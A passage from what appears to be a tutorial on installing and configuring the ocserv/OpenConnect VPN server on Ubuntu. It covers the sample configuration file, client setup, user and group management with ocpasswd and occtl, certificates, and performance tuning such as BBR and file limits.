# for the DHE ciphersuites (by default this server supports ECDHE).
# Can be generated using:
# certtool --generate-dh-params --outfile /path/to/dh.pem
#dh-params = /path/to/dh.pem
# In case PKCS #11, TPM or encrypted keys are used the PINs should be available
# in files. The srk-pin-file is applicable to TPM keys only, and is the 
# storage root key.
#pin-file = /path/to/pin.txt
#srk-pin-file = /path/to/srkpin.txt
# The password or PIN needed to unlock the key in server-key file.
# Only needed if the file is encrypted or a PKCS #11 object. This
# is an alternative method to pin-file.
#key-pin = 1234
# The SRK PIN for TPM.
# This is an alternative method to srk-pin-file.
#srk-pin = 1234
# The Certificate Authority that will be used to verify
# client certificates (public keys) if certificate authentication
# is set.
ca-cert = /etc/ssl/certs/ssl-cert-snakeoil.pem
### All configuration options below this line are reloaded on a SIGHUP.
### The options above, will remain unchanged. Note however, that the 
### server-cert, server-key, dh-params and ca-cert options will be reloaded
### if the provided file changes, on server reload. That allows certificate
### rotation, but requires the server key to remain the same for seamless
### operation. If the server key changes on reload, there may be connection
### failures during the reloading time.
# Whether to enable seccomp/Linux namespaces worker isolation. That restricts the number of 
# system calls allowed to a worker process, in order to reduce damage from a
# bug in the worker process. It is available on Linux systems at a performance cost.
# The performance cost is roughly 2% overhead at transfer time (tested on a Linux 3.17.8).
# Note however, that process isolation is restricted to the specific libc versions
# the isolation was tested at. If you get random failures on worker processes, try
# disabling that option and report the failures you, along with system and debugging
# information at: https://gitlab.com/ocserv/ocserv/issues
isolate-workers = true
# A banner to be displayed on clients
#banner = "Welcome"
# Limit the number of clients. Unset or set to zero for unlimited.
#max-clients = 1024
max-clients = 128
# Limit the number of identical clients (i.e., users connecting 
# multiple times). Unset or set to zero for unlimited.
max-same-clients = 2
# When the server receives connections from a proxy, like haproxy
# which supports the proxy protocol, set this to obtain the correct
# client addresses. The proxy protocol (v2) would then be expected in
# the TCP or UNIX socket (not the UDP one).
#listen-proxy-proto = true
# Limit the number of client connections to one every X milliseconds 
# (X is the provided value). Set to zero for no limit.
#rate-limit-ms = 100
# Stats report time. The number of seconds after which each
# worker process will report its usage statistics (number of
# bytes transferred etc). This is useful when accounting like
# radius is in use.
#stats-report-time = 360
# Stats reset time. The period of time statistics kept by main/sec-mod
# processes will be reset. These are the statistics shown by cmd
# 'occtl show stats'. For daily: 86400, weekly: 604800
# This is unrelated to stats-report-time.
server-stats-reset-time = 604800
# Keepalive in seconds
keepalive = 300
# Dead peer detection in seconds.
# Note that when the client is behind a NAT this value
# needs to be short enough to prevent the NAT disassociating
# his UDP session from the port number. Otherwise the client
# could have his UDP connection stalled, for several minutes.
dpd = 60
# Dead peer detection for mobile clients. That needs to
# be higher to prevent such clients being awaken too 
# often by the DPD messages, and save battery.
# The mobile clients are distinguished from the header
# 'X-AnyConnect-Identifier-Platform'.
mobile-dpd = 300
# If using DTLS, and no UDP traffic is received for this
# many seconds, attempt to send future traffic over the TCP
# connection instead, in an attempt to wake up the client
# in the case that there is a NAT and the UDP translation
# was deleted. If this is unset, do not attempt to use this
# recovery mechanism.
switch-to-tcp-timeout = 30
# MTU discovery (DPD must be enabled)
try-mtu-discovery = false
# If you have a certificate from a CA that provides an OCSP
# service you may provide a fresh OCSP status response within
# the TLS handshake. That will prevent the client from connecting
# independently on the OCSP server.
# You can update this response periodically using:
# ocsptool --ask --load-cert=your_cert --load-issuer=your_ca --outfile response
# Make sure that you replace the following file in an atomic way.
#ocsp-response = /path/to/ocsp.der
# The object identifier that will be used to read the user ID in the client 
# certificate. The object identifier should be part of the certificate's DN
# Useful OIDs are: 
#  CN = 2.5.4.3, UID = 0.9.2342.19200300.100.1.1
cert-user-oid = 0.9.2342.19200300.100.1.1
# The object identifier that will be used to read the user group in the 
# client certificate. The object identifier should be part of the certificate's
# DN. If the user may belong to multiple groups, then use multiple such fields
# in the certificate's DN. Useful OIDs are: 
#  OU (organizational unit) = 2.5.4.11 
#cert-group-oid = 2.5.4.11
# The revocation list of the certificates issued by the 'ca-cert' above.
# See the manual to generate an empty CRL initially. The CRL will be reloaded
# periodically when ocserv detects a change in the file. To force a reload use
# SIGHUP.
#crl = /path/to/crl.pem
# Uncomment this to enable compression negotiation (LZS, LZ4).
compression = true
# Set the minimum size under which a packet will not be compressed.
# That is to allow low-latency for VoIP packets. The default size
# is 256 bytes. Modify it if the clients typically use compression
# as well of VoIP with codecs that exceed the default value.
no-compress-limit = 256
# GnuTLS priority string; note that SSL 3.0 is disabled by default
# as there are no openconnect (and possibly anyconnect clients) using
# that protocol. The string below does not enforce perfect forward
# secrecy, in order to be compatible with legacy clients.
#
# Note that the most performant ciphersuites are the moment are the ones
# involving AES-GCM. These are very fast in x86 and x86-64 hardware, and
# in addition require no padding, thus taking full advantage of the MTU.
# For that to be taken advantage of, the openconnect client must be
# used, and the server must be compiled against GnuTLS 3.2.7 or later.
# Use "gnutls-cli --benchmark-tls-ciphers", to see the performance
# difference with AES_128_CBC_SHA1 (the default for anyconnect clients)
# in your system.
# More combinations in priority strings are available, check
# http://gnutls.org/manual/html_node/Priority-Strings.html
# E.g., the string below enforces perfect forward secrecy (PFS) 
# on the main channel.
tls-priorities = "NORMAL:%SERVER_PRECEDENCE:%COMPAT:-RSA:-VERS-SSL3.0:-ARCFOUR-128"
# That option requires the established DTLS channel to use the same
# cipher as the primary TLS channel. This cannot be combined with
# listen-clear-file since the ciphersuite information is not available
# in that configuration. Note also, that this option implies that
# dtls-legacy option is false; this option cannot be enforced
# in the legacy/compat protocol.
#match-tls-dtls-ciphers = true
# The time (in seconds) that a client is allowed to stay connected prior
# to authentication
auth-timeout = 240
# The time (in seconds) that a client is allowed to stay idle (no traffic)
# before being disconnected. Unset to disable.
idle-timeout = 1200
# The time (in seconds) that a mobile client is allowed to stay idle (no
# traffic) before being disconnected. Unset to disable.
mobile-idle-timeout = 1800
# The time (in seconds) that a client is not allowed to reconnect after 
# a failed authentication attempt.
min-reauth-time = 3
# Banning clients in ocserv works with a point system. IP addresses
# that get a score over that configured number are banned for
# min-reauth-time seconds. By default a wrong password attempt is 10 points,
# a KKDCP POST is 1 point, and a connection is 1 point. Note that
# due to difference processes being involved the count of points
# will not be real-time precise.
#
# Score banning cannot be reliably used when receiving proxied connections
# locally from an HTTP server (i.e., when listen-clear-file is used).
#
# Set to zero to disable.
max-ban-score = 50
# The time (in seconds) that all score kept for a client is reset.
ban-reset-time = 300
# In case you'd like to change the default points.
#ban-points-wrong-password = 10
#ban-points-connection = 1
#ban-points-kkdcp = 1
# Cookie timeout (in seconds)
# Once a client is authenticated he's provided a cookie with
# which he can reconnect. That cookie will be invalidated if not
# used within this timeout value. This cookie remains valid, during
# the user's connected time, and after user disconnection it
# remains active for this amount of time. That setting should allow a
# reasonable amount of time for roaming between different networks.
cookie-timeout = 300
# If this is enabled (not recommended) the cookies will stay
# valid even after a user manually disconnects, and until they
# expire. This may improve roaming with some broken clients.
#persistent-cookies = true
# Whether roaming is allowed, i.e., if true a cookie is
# restricted to a single IP address and cannot be re-used
# from a different IP.
deny-roaming = false
# ReKey time (in seconds)
# ocserv will ask the client to refresh keys periodically once
# this amount of seconds is elapsed. Set to zero to disable (note
# that, some clients fail if rekey is disabled).
rekey-time = 172800
# ReKey method
# Valid options: ssl, new-tunnel
#  ssl: Will perform an efficient rehandshake on the channel allowing
#       a seamless connection during rekey.
#  new-tunnel: Will instruct the client to discard and re-establish the channel.
#       Use this option only if the connecting clients have issues with the ssl
#       option.
rekey-method = ssl
# Script to call when a client connects and obtains an IP.
# The following parameters are passed on the environment.
# REASON, USERNAME, GROUPNAME, DEVICE, IP_REAL (the real IP of the client),
# IP_REAL_LOCAL (the local interface IP the client connected), IP_LOCAL
# (the local IP in the P-t-P connection), IP_REMOTE (the VPN IP of the client),
# IPV6_LOCAL (the IPv6 local address if there are both IPv4 and IPv6
# assigned), IPV6_REMOTE (the IPv6 remote address), IPV6_PREFIX, and
# ID (a unique numeric ID); REASON may be "connect" or "disconnect".
# In addition the following variables OCSERV_ROUTES (the applied routes for this
# client), OCSERV_NO_ROUTES, OCSERV_DNS (the DNS servers for this client),
# will contain a space separated list of routes or DNS servers. A version
# of these variables with the 4 or 6 suffix will contain only the IPv4 or
# IPv6 values.
# The disconnect script will receive the additional values: STATS_BYTES_IN,
# STATS_BYTES_OUT, STATS_DURATION that contain a 64-bit counter of the bytes 
# output from the tun device, and the duration of the session in seconds.
#connect-script = /usr/bin/myscript
#disconnect-script = /usr/bin/myscript
# UTMP
# Register the connected clients to utmp. This will allow viewing
# the connected clients using the command 'who'.
#use-utmp = true
# Whether to enable support for the occtl tool (i.e., either through D-BUS,
# or via a unix socket).
use-occtl = true
# PID file. It can be overriden in the command line.
pid-file = /run/ocserv.pid
# Set the protocol-defined priority (SO_PRIORITY) for packets to
# be sent. That is a number from 0 to 6 with 0 being the lowest
# priority. Alternatively this can be used to set the IP Type-
# Of-Service, by setting it to a hexadecimal number (e.g., 0x20).
# This can be set per user/group or globally.
#net-priority = 3
# Set the VPN worker process into a specific cgroup. This is Linux
# specific and can be set per user/group or globally.
#cgroup = "cpuset,cpu:test"
#
# Network settings
#
# The name to use for the tun device
device = vpns
# Whether the generated IPs will be predictable, i.e., IP stays the
# same for the same user when possible.
predictable-ips = true
# The default domain to be advertised
default-domain = example.com
# The pool of addresses that leases will be given from. If the leases
# are given via Radius, or via the explicit-ip? per-user config option then 
# these network values should contain a network with at least a single
# address that will remain under the full control of ocserv (that is
# to be able to assign the local part of the tun device address).
# Note that, you could use addresses from a subnet of your LAN network if you
# enable proxy arp in the LAN interface (see http://infradead.org/ocserv/recipes-ocserv-pseudo-bridge.html);
# in that case it is recommended to set ping-leases to true.
ipv4-network = 192.168.101.0
ipv4-netmask = 255.255.255.0
# An alternative way of specifying the network:
#ipv4-network = 192.168.1.0/24
# The IPv6 subnet that leases will be given from.
#ipv6-network = fda9:4efe:7e3b:03ea::/48 
# Specify the size of the network to provide to clients. It is
# generally recommended to provide clients with a /64 network in
# IPv6, but any subnet may be specified. To provide clients only
# with a single IP use the prefix 128.
#ipv6-subnet-prefix = 128
#ipv6-subnet-prefix = 64
# Whether to tunnel all DNS queries via the VPN. This is the default
# when a default route is set.
#tunnel-all-dns = true
# The advertized DNS server. Use multiple lines for
# multiple servers.
# dns = fc00::4be0
dns = 8.8.8.8
dns = 8.8.4.4
# The NBNS server (if any)
#nbns = 192.168.1.3
# The domains over which the provided DNS should be used. Use
# multiple lines for multiple domains.
#split-dns = example.com
# Prior to leasing any IP from the pool ping it to verify that
# it is not in use by another (unrelated to this server) host.
# Only set to true, if there can be occupied addresses in the
# IP range for leases.
ping-leases = false
# Use this option to set a link MTU value to the incoming
# connections. Unset to use the default MTU of the TUN device.
# Note that the MTU is negotiated using the value set and the
# value sent by the peer.
#mtu = 1420
# Unset to enable bandwidth restrictions (in bytes/sec). The
# setting here is global, but can also be set per user or per group.
#rx-data-per-sec = 40000
#tx-data-per-sec = 40000
# The number of packets (of MTU size) that are available in
# the output buffer. The default is low to improve latency.
# Setting it higher will improve throughput.
#output-buffer = 10
# Routes to be forwarded to the client. If you need the
# client to forward routes to the server, you may use the 
# config-per-user/group or even connect and disconnect scripts.
#
# To set the server as the default gateway for the client just
# comment out all routes from the server, or use the special keyword
# 'default'.
#route = 10.0.0.0/8
#route = 172.16.0.0/12
#route = 192.168.0.0/16
#route = fd00::/8
route = default
# Subsets of the routes above that will not be routed by
# the server.
#no-route = 192.168.5.0/255.255.255.0
# Note the that following two firewalling options currently are available
# in Linux systems with iptables software. 
# If set, the script /usr/bin/ocserv-fw will be called to restrict
# the user to its allowed routes and prevent him from accessing
# any other routes. In case of defaultroute, the no-routes are restricted.
# All the routes applied by ocserv can be reverted using /usr/bin/ocserv-fw
# --removeall. This option can be set globally or in the per-user configuration.
#restrict-user-to-routes = true
# This option implies restrict-user-to-routes set to true. If set, the
# script /usr/bin/ocserv-fw will be called to restrict the user to
# access specific ports in the network. This option can be set globally
# or in the per-user configuration.
#restrict-user-to-ports = "tcp(443), tcp(80), udp(443), sctp(99), tcp(583), icmp(), icmpv6()"
# You could also use negation, i.e., block the user from accessing these ports only.
#restrict-user-to-ports = "!(tcp(443), tcp(80))"
# When set to true, all client's iroutes are made visible to all
# connecting clients except for the ones offering them. This option
# only makes sense if config-per-user is set.
#expose-iroutes = true
# Groups that a client is allowed to select from.
# A client may belong in multiple groups, and in certain use-cases
# it is needed to switch between them. For these cases the client can
# select prior to authentication. Add multiple entries for multiple groups.
# The group may be followed by a user-friendly name in brackets.
#select-group = group1
#select-group = group2[My special group]
# The name of the (virtual) group that if selected it would assign the user
# to its default group.
#default-select-group = DEFAULT
# Instead of specifying manually all the allowed groups, you may instruct
# ocserv to scan all available groups and include the full list.
#auto-select-group = true
# Configuration files that will be applied per user connection or
# per group. Each file name on these directories must match the username
# or the groupname.
# The options allowed in the configuration files are dns, nbns,
#  ipv?-network, ipv4-netmask, rx/tx-per-sec, iroute, route, no-route,
#  explicit-ipv4, explicit-ipv6, net-priority, deny-roaming, no-udp, 
#  keepalive, dpd, mobile-dpd, max-same-clients, tunnel-all-dns,
#  restrict-user-to-routes, user-profile, cgroup, stats-report-time,
#  mtu, idle-timeout, mobile-idle-timeout, restrict-user-to-ports,
#  and session-timeout.
#
# Note that the 'iroute' option allows to add routes on the server
# based on a user or group. The syntax depends on the input accepted
# by the commands route-add-cmd and route-del-cmd (see below). The no-udp
# is a boolean option (e.g., no-udp = true), and will prevent a UDP session
# for that specific user or group. The hostname option will set a
# hostname to override any proposed by the user. Note also, that, any 
# routes, no-routes, DNS or NBNS servers present will overwrite the global ones.
#config-per-user = /etc/ocserv/config-per-user/
#config-per-group = /etc/ocserv/config-per-group/
# When config-per-xxx is specified and there is no group or user that
# matches, then utilize the following configuration.
#default-user-config = /etc/ocserv/defaults/user.conf
#default-group-config = /etc/ocserv/defaults/group.conf
# The system command to use to setup a route. %{R} will be replaced with the
# route/mask, %{RI} with the route in CIDR format, and %{D} with the (tun) device.
#
# The following example is from linux systems. %{R} should be something
# like 192.168.2.0/255.255.255.0 and %{RI} 192.168.2.0/24 (the argument of iroute).
#route-add-cmd = "ip route add %{R} dev %{D}"
#route-del-cmd = "ip route delete %{R} dev %{D}"
# This option allows to forward a proxy. The special keywords '%{U}'
# and '%{G}', if present will be replaced by the username and group name.
#proxy-url = http://example.com/
#proxy-url = http://example.com/%{U}/
# This option allows you to specify a URL location where a client can
# post using MS-KKDCP, and the message will be forwarded to the provided
# KDC server. That is a translation URL between HTTP and Kerberos.
# In MIT kerberos you'll need to add in realms:
#   EXAMPLE.COM = {
#     kdc = https://ocserv.example.com/KdcProxy
#     http_anchors = FILE:/etc/ocserv-ca.pem
#   }
# In some distributions the krb5-k5tls plugin of kinit is required.
#
# The following option is available in ocserv, when compiled with GSSAPI support. 
#kkdcp = "SERVER-PATH KERBEROS-REALM [email protected]:PORT"
#kkdcp = "/KdcProxy KERBEROS.REALM [email protected]:88"
#kkdcp = "/KdcProxy KERBEROS.REALM [email protected]:88"
#kkdcp = "/KdcProxy KERBEROS.REALM [email protected][::1]:88"
#
# The following options are for (experimental) AnyConnect client 
# compatibility. 
# This option will enable the pre-draft-DTLS version of DTLS, and
# will not require clients to present their certificate on every TLS
# connection. It must be set to true to support legacy CISCO clients
# and openconnect clients < 7.08. When set to true, it implies dtls-legacy = true.
cisco-client-compat = true
# This option allows to disable the DTLS-PSK negotiation (enabled by default).
# The DTLS-PSK negotiation was introduced in ocserv 0.11.5 to deprecate
# the pre-draft-DTLS negotiation inherited from AnyConnect. It allows the
# DTLS channel to negotiate its ciphers and the DTLS protocol version.
#dtls-psk = false
# This option allows to disable the legacy DTLS negotiation (enabled by default,
# but that may change in the future).
# The legacy DTLS uses a pre-draft version of the DTLS protocol and was
# from AnyConnect protocol. It has several limitations, that are addressed
# by the dtls-psk protocol supported by openconnect 7.08+.
dtls-legacy = true
# Client profile xml. A sample file exists in doc/profile.xml.
# It is required by some of the CISCO clients.
# This file must be accessible from inside the worker's chroot. 
# Note that enabling this option is not recommended as it will allow
# the worker processes to open arbitrary files (when isolate-workers is
# set to true).
#user-profile = /path/to/file.xml
#Advanced options
# Option to allow sending arbitrary custom headers to the client after
# authentication and prior to VPN tunnel establishment. You shouldn't
# need to use this option normally; if you do and you think that
# this may help others, please send your settings and reason to
# the openconnect mailing list. The special keywords '%{U}'
# and '%{G}', if present will be replaced by the username and group name.
#custom-header = "X-My-Header: hi there"
# An example virtual host with different authentication methods serviced
# # by this server.
#
# [vhost:www.example.com]
# auth = "certificate"
#
# ca-cert = ../tests/certs/ca.pem
#
# # The certificate set here must include a 'dns_name' corresponding to
# # the virtual host name.
#
# server-cert = ../tests/certs/server-cert-secp521r1.pem
# server-key = ../tests/certs/server-key-secp521r1.pem
#
# ipv4-network = 192.168.2.0
# ipv4-netmask = 255.255.255.0
#
# cert-user-oid = 0.9.2342.19200300.100.1.1
#

2 Get the OCserv/OpenConnect VPN Server and Clients running

2.1 On the Ubuntu Server 19, we restart the ocserv process to apply the settings we just made

sudo systemctl restart ocserv

2.2 On the client

(We can use Cisco Anyconnect client on iOS, Android on other platforms/OS) (Here we use Windows 10) we can install openconnect-gui client or Cisco Anyconnect client, in the example we use openconnect-gui

2.2.1 We download and install the client, openconnect-gui

Download link: https://github.com/openconnect/openconnect-gui/releases

2.2.2 Once done, launch the client

OpenConnect-GUI VPN client icon
OpenConnect-GUI VPN client icon

2.2.3 Click on the icon then click on “New profile”

OpenConnect-GUI Create new profile
OpenConnect-GUI Create new profile

2.2.4 Enter your Ubuntu Server IP address “https://Ubuntu Server IP address”, click on “Save & Connect” button

OpenConnect-GUI Gateway
OpenConnect-GUI Gateway

2.2.5 Click on “Accurate information” to continue (You can click on “Show Details…” button to have a look on the certificate file if necessary)

OpenConnect-GUI Accept certificate
OpenConnect-GUI Accept certificate

2.2.6 If it did not ask for your username, click on “Connect” button

OpenConnect-GUI Connect
OpenConnect-GUI Connect

2.2.7 Enter your Ubuntu Server 19 username and password, then click on “OK” button to connect

OpenConnect-GUI - Connect - Username
OpenConnect-GUI – Connect – Username
OpenConnect-GUI - Connect - Password
OpenConnect-GUI – Connect – Password

2.2.8 We should be connected now, a green lock icon will appear, click on “View log” to view connection information/log if necessary

OpenConnect-GUI - Connected
OpenConnect-GUI – Connected

2.2.9 Click on “VPN Info” Tab, we will see more information about current connection

OpenConnect-GUI - VPN Info
OpenConnect-GUI – VPN Info

3 Get the OCserv/OpenConnect VPN Server connection information

3.1 Show current ocserv status

sudo occtl -n show status
Show current ocserv status
Show current ocserv status

3.2 Show current online users

sudo occtl -n show users
Show current online users
Show current online users

3.3 Other show options

[email protected]:~$ sudo occtl -n show
[sudo] password for dc1:
      show status       Prints the status and statistics of the server
       show users       Prints the connected users
     show ip bans       Prints the banned IP addresses
 show ip ban points     Prints all the known IP addresses which have points
     show iroutes       Prints the routes provided by users of the server
 show sessions all      Prints all the session IDs
 show sessions valid    Prints all the valid for reconnection sessions
 show session [SID]     Prints information on the specified session
    show user [NAME]    Prints information on the specified user
      show id [ID]      Prints information on the specified ID
      show events       Provides information about connecting users
 show cookies all       Alias for show sessions all
 show cookies valid     Alias for show sessions valid
[email protected]:~$

3.4 Kick/Disconnect user

sudo occtl disconnect user [username]
 
# e.g.
sudo occtl disconnect user test
or
sudo occtl disconnect id [id number]

4 Extend

4.1 Use dedicate VPN account/username and password pair rather than using system user accounts (PAM) by default

4.1.1 Create user test with password test

sudo ocpaswd -c /etc/ocserv/ocpasswd test
ocpasswd create user
ocpasswd create user

4.1.2 Make ocserv authenticate through dedicate user accounts file for client to login by modifying ocserv configuration file

sudo nnao /etc/ocserv/ocserv.conf

Add # in front of

auth = "pam[gid-min=1000]"

Add a new line

auth = "plain[passwd=/etc/ocserv/ocpasswd]"

Restart ocserv server

sudo systemctl restart ocserv

Now we can use username:test and password:test to login to VPN

4.1.3 Delete/Remove VPN users

sudo nano /etc/ocserv/ocpasswd

Remove the line with unwanted username (Here we only have user “test”, if we remove this line, user test will not be able to login to VPN again)

ocpasswd file
ocpasswd file

Use Ctrl + X, Y, Enter key to Exit and Save the file

4.2 Create different user groups and assign them different routing tables (route, no-route etc.)

4.2.1 Create users with groups

sudo ocpasswd -c /etc/ocserv/ocpasswd -g group1 test1
 
sudo ocpasswd -c /etc/ocserv/ocpasswd -g group2 test2
Create two users with different groups
Create two users with different groups

4.2.2 Create different group rules/routing tables/route

# Create folder for saving group configuration files
sudo mkdir /etc/ocserv/groups
 
# Create route rules for group1
sudo bash -c 'echo "route=192.168.101.1/24" > /etc/ocserv/groups/group1'
 
# Create route rules for group 2
sudo bash -c 'echo "no-route=192.168.102.1/24" > /etc/ocserv/groups/group2'

4.2.3 Modify configuration file to use our group configuration file

4.2.3.1 We can use nano to edit the file or use echo >> to append configuration to the bottom of the file (By default those settings are commented out, otherwise we have to replace them rather than append)

# Per Group config folder
sudo bash -c 'echo "config-per-group = /etc/ocserv/groups/" >> /etc/ocserv/ocserv.conf'
 
# If we do not specify user group, when creating the user, by default they will use routing tables from group1
sudo bash -c 'echo "default-group-config = /etc/ocserv/groups/group1" >> /etc/ocserv/ocserv.conf'
 
# The name of the (virtual) group that if selected it would assign the user to its default group. (If we do not specify user group, when creating the user, by default they will use routing tables from group1)
sudo bash -c 'echo "default-select-group = group1" >> /etc/ocserv/ocserv.conf'

4.2.3.2 Restart the ocserv process

sudo systemctl restart ocserv

4.2.3.3 Now we can use test1:test1 test2:test2 to test connections

4.3 Configure “default-domain”

4.3.1 Open the configuration file

sudo nano /etc/ocserv/ocserv.conf

4.3.2 Find “default-domain = example.com” and replace the “exapmle.com” with the external IP address or proper domain name that users will use to connect to the VPN server

4.3.3 Save and Exit the file and Restart the ocserv process

Ctrl + X, Y, Enter key
 
sudo systemctl restart ocserv

4.4 Configure SSL certificate

4.4.1 Regenerate system default SSL certificates

By default ocserv uses system default ssl certificates at following location

/etc/ssl/certs/ssl-cert-snakeoil.pem
/etc/ssl/private/ssl-cert-snakeoil.key

We can use following command to regenerate those certificates

sudo make-ssl-cert generate-default-snakeoil --force-overwrite

4.4.2 Create our own self-signed SSL certificates

We can use following command to create our own self-signed SSL certificates

openssl req -x509 -nodes -days 365 -newkey rsa:4096 -keyout certificate-key.key -out certificate-cert.pem

More on self-signed SSL certificates/openssl command can be found here: How to: Create self-signed SSL/TLS certificates on Linux/Ubuntu etc. easily & quickly (Use self-signed with caution!)

4.4.3 Configure ocserv to use specific SSL certificates

sudo nano /etc/ocserv/ocserv.conf

4.4.3.1 Find following lines

server-cert = /etc/ssl/certs/ssl-cert-snakeoil.pem
server-key = /etc/ssl/private/ssl-cert-snakeoil.key
ca-cert = /etc/ssl/certs/ssl-cert-snakeoil.pem

4.4.3.2 Modify as desired

4.4.3.3 Save and Exit the file and Restart the ocserv process

Ctrl + X, Y, Enter key
 
sudo systemctl restart ocserv

4.5 Optimization

4.5.1 Change ocserv ports (Usually 443 is the best port for SSL VPN) if necessary

sudo nano /etc/ocserv/ocserv.conf

4.5.1.1 Find following lines

tcp-port = 443
udp-port = 443

4.5.1.2 Modify as desired

4.5.1.3 Save and Exit the file and Restart the ocserv process

Ctrl + X, Y, Enter key
 
sudo systemctl restart ocserv

4.5.2 Limit the number of clients

Modify if necessary

sudo nano /etc/ocserv/ocserv.conf

4.5.2.1 Find following lines

# Limit the number of clients. Unset or set to zero for unlimited.
#max-clients = 1024
max-clients = 128

4.5.2.2 Save and Exit the file and Restart the ocserv process

Ctrl + X, Y, Enter key
 
sudo systemctl restart ocserv

4.5.3 Limit the number of identical clients (users connecting multiple times)

Modify if necessary

sudo nano /etc/ocserv/ocserv.conf

4.5.3.1 Find following lines

# Limit the number of identical clients (i.e., users connecting multiple times). Unset or set to zero for unlimited.
max-same-clients = 2

4.5.3.2 Save and Exit the file and Restart the ocserv process

Ctrl + X, Y, Enter key
 
sudo systemctl restart ocserv

4.5.4 Other places in configuration file we can look into to optimize

Configuration file: /etc/ocserv/ocserv.conf

# Keepalive in seconds
keepalive = 300
 
# Dead peer detection in seconds.
# Note that when the client is behind a NAT this value
# needs to be short enough to prevent the NAT disassociating
# his UDP session from the port number. Otherwise the client
# could have his UDP connection stalled, for several minutes.
dpd = 60
 
# Dead peer detection for mobile clients. That needs to
# be higher to prevent such clients being awaken too
# often by the DPD messages, and save battery.
# The mobile clients are distinguished from the header
# 'X-AnyConnect-Identifier-Platform'.
mobile-dpd = 300
 
## Set to true may improve performance
# MTU discovery (DPD must be enabled)
try-mtu-discovery = false
 
# If using DTLS, and no UDP traffic is received for this
# many seconds, attempt to send future traffic over the TCP
# connection instead, in an attempt to wake up the client
# in the case that there is a NAT and the UDP translation
# was deleted. If this is unset, do not attempt to use this
# recovery mechanism.
switch-to-tcp-timeout = 30
 
# The time (in seconds) that a client is allowed to stay connected prior
# to authentication
auth-timeout = 240
 
# The time (in seconds) that a client is allowed to stay idle (no traffic)
# before being disconnected. Unset to disable.
idle-timeout = 1200
 
# The time (in seconds) that a mobile client is allowed to stay idle (no
# traffic) before being disconnected. Unset to disable.
mobile-idle-timeout = 1800
 
# Banning clients in ocserv works with a point system. IP addresses
# that get a score over that configured number are banned for
# min-reauth-time seconds. By default a wrong password attempt is 10 points,
# a KKDCP POST is 1 point, and a connection is 1 point. Note that
# due to difference processes being involved the count of points
# will not be real-time precise.
#
# Score banning cannot be reliably used when receiving proxied connections
# locally from an HTTP server (i.e., when listen-clear-file is used).
#
# Set to zero to disable.
max-ban-score = 50
 
# The time (in seconds) that all score kept for a client is reset.
ban-reset-time = 300
 
# Cookie timeout (in seconds)
# Once a client is authenticated he's provided a cookie with
# which he can reconnect. That cookie will be invalidated if not
# used within this timeout value. This cookie remains valid, during
# the user's connected time, and after user disconnection it
# remains active for this amount of time. That setting should allow a
# reasonable amount of time for roaming between different networks.
cookie-timeout = 300
 
# Whether roaming is allowed, i.e., if true a cookie is
# restricted to a single IP address and cannot be re-used
# from a different IP.
deny-roaming = false
 
# ReKey time (in seconds)
# ocserv will ask the client to refresh keys periodically once
# this amount of seconds is elapsed. Set to zero to disable (note
# that, some clients fail if rekey is disabled).
rekey-time = 172800
 
# The name to use for the tun device
device = vpns
 
# Whether the generated IPs will be predictable, i.e., IP stays the
# same for the same user when possible.
predictable-ips = true
 
# Prior to leasing any IP from the pool ping it to verify that
# it is not in use by another (unrelated to this server) host.
# Only set to true, if there can be occupied addresses in the
# IP range for leases.
ping-leases = false
 
# Use this option to set a link MTU value to the incoming
# connections. Unset to use the default MTU of the TUN device.
# Note that the MTU is negotiated using the value set and the
# value sent by the peer.
#mtu = 1420
 
## Depending on latendy/throuput requirements
# The number of packets (of MTU size) that are available in
# the output buffer. The default is low to improve latency.
# Setting it higher will improve throughput.
#output-buffer = 10

4.5.5 ocpasswd command (From ocserv)

Add user

sudo ocpasswd -c /etc/ocserv/ocpasswd [username]

Add user to group

sudo ocpasswd -c /etc/ocserv/ocpasswd -g [GroupName] [UserName]

Lock user

sudo ocpasswd -c /etc/ocserv/ocpasswd -l [username]

Unlock user

sudo ocpasswd -c /etc/ocserv/ocpasswd -u [username]

Delete/Remove user

sudo ocpasswd -c /etc/ocserv/ocpasswd -d [username]

ocpasswd help

ocpasswd help
ocpasswd help

4.5.6 occtl command (From ocserv)

Show ocserv current status

sudo occtl -n show status
Show ocserv current status
Show ocserv current status

Show online user details

sudo occtl -n show users
Show online user details
Show online user details

Show all session IDs

sudo occtl -n show sessions all
Show all session IDs
Show all session IDs

Kick/Disconnect online users by their username

sudo occtl disconnect user [username]

Kick/Disconnect online users by their ID

sudo occtl disconnect id [UserID]

occtl help

occtl help
occtl help

4.5.7 Ubuntu system optimization

Enabling TCP BBR congestion control algorithm

4.5.5.1 Check current congestion control algorithm that Ubuntu Server is using (By default it should be cubic)

sysctl net.ipv4.tcp_congestion_control
 
# Output
net.ipv4.tcp_congestion_control = cubic

4.5.5.2 Check supported congestion control algorithm

sysctl net.ipv4.tcp_available_congestion_control
 
# Output
net.ipv4.tcp_available_congestion_control = reno cubic

4.5.5.3 Enabling BBR by using following commands

Append settings to the end of “/etc/sysctl.conf” file, then apply

sudo bash -c 'echo "net.core.default_qdisc=fq" >> /etc/sysctl.conf'
 
sudo bash -c 'echo "net.ipv4.tcp_congestion_control=bbr" >> /etc/sysctl.conf'
 
sudo sysctl -p

Note: (To revert the changes just remove net.core.default_qdisc=fq and net.ipv4.tcp_congestion_control=bbr, then use sudo sysctl -p again to apply the revert)

4.5.5.4 Check current congestion control algorithm

sysctl net.ipv4.tcp_congestion_control
 
# Output
net.ipv4.tcp_congestion_control = bbr

4.5.8 Increase ulimit number (Open Files limit)

By default ulimit is 1024, which can be one of the bottleneck for ocserv process when there are too many connections or users

Increase it and adjust the number accordingly, here in the example we increase it to 51200 (You have to find a number that suites your system, or it might crash the system when it’s under pressure)

# Increase soft limit to 512000 for all users (The default is 1024)
sudo bash -c 'echo "* soft nofile 512000" >> /etc/security/limits.conf'
 
# Increase hard limit to 512000 for all users(The default is 1024)
sudo bash -c 'echo "* hard nofile 512000" >> /etc/security/limits.conf'
 
# Restart the system
sudo reboot

(We can also use “ulimit -n 51200” to make temporary change, it will be lost after reboot)

Check current Hard limit, Soft limit

ulimit -Hn
 
ulimit -Sn
 
# Check limit other users
su - www-data -c 'ulimit -aHS' -s '/bin/bash'
Other places might need to be changed to make it work (Sometimes we need to modify this value as well)

Change System-Wide Limit:

Modify the value (2097152) accordingly

# Append the changes to the bottom of the sysctl.conf file
sudo bash -c 'echo "fs.file-max = 2097152" >> /etc/sysctl.conf'
 
# Apply the change
sudo sysctl -p
ulimit vs fs.file-max

